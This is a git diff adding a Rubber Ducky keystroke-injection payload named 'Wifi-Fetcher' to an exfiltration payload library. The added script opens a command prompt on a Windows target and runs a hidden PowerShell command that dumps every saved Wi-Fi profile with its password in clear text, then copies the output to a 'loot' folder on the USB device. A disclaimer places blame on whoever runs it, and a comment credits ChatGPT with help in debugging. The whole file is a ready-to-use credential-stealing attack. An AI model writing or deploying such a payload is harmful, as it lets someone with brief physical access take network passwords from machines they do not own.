diff --git a/payloads/library/exfiltration/Wifi-Fetcher b/payloads/library/exfiltration/Wifi-Fetcher new file mode 100644 index 000000000..96940c0f3 --- /dev/null +++ b/payloads/library/exfiltration/Wifi-Fetcher @@ -0,0 +1,28 @@ +REM NAME: Wifi-Fetcher +REM AUTHOR: nightcrafttrl1 +REM DEVICE: RubberDucky +REM TARGETS: WINDOWS 7 or greater +REM DESCRIPTION: This payload will fetch the windows system for the passwords and other info about every wifi network the system can connect to, +REM After creating the directory and adjusting the delays, it IS basically plug 'n play +REM You are safe to plug out the rubber ducky once the minimized powershell windows closes by itself +REM +REM credits:ChatGPT helped a little here and there while debugging +REM DEPENDENCIES: NONE +REM TOTAL_EXEC_TIME: 18.5 seconds (may vary based of taged specifications) +DEFINE DISC "the end User of the Script IS the only Person Held responsible for the harm or leak of information caused by the payload, Neither the creator of the Script nor the Distribute(Hak5 LLC.) shall BE Held responsible for any damages caused." +REM +DEFINE INSTR "IF YOU DON'T HAVE THE DIRECTORY D:\loot\PwnedWIFI\ ON THE DUCKY, THIS SCRIPT WILL NOT WORK. EITHER CREATE THE DIRECTORY OR MODIFY THE PAYLOAD TO STORE THE OUTPUT FILE ELSEWHERE" +REM +REM +REM +DELAY 1000 +REM Switch to HID STORAGE mode +ATTACKMODE HID STORAGE +DELAY 4000 +GUI r +DELAY 100 +STRINGLN cmd +DELAY 220 +STRINGLN color FE +DELAY 50 +STRINGLN start /MIN powershell "netsh wlan show profiles | Select-String 'All User Profile\s*:\s*(.+)' | ForEach-Object { $_ -match 'All User Profile\s*:\s*(.+)'; $matches[1] } | ForEach-Object { netsh wlan show profile name=$_ key=clear } | Out-File -FilePath 'D:\loot\PwnedWIFI\all_wifi_info.txt'; netsh wlan export profile key=clear | Out-File -Append -FilePath 'D:\loot\PwnedWIFI\all_wifi_passwords.txt';" & exit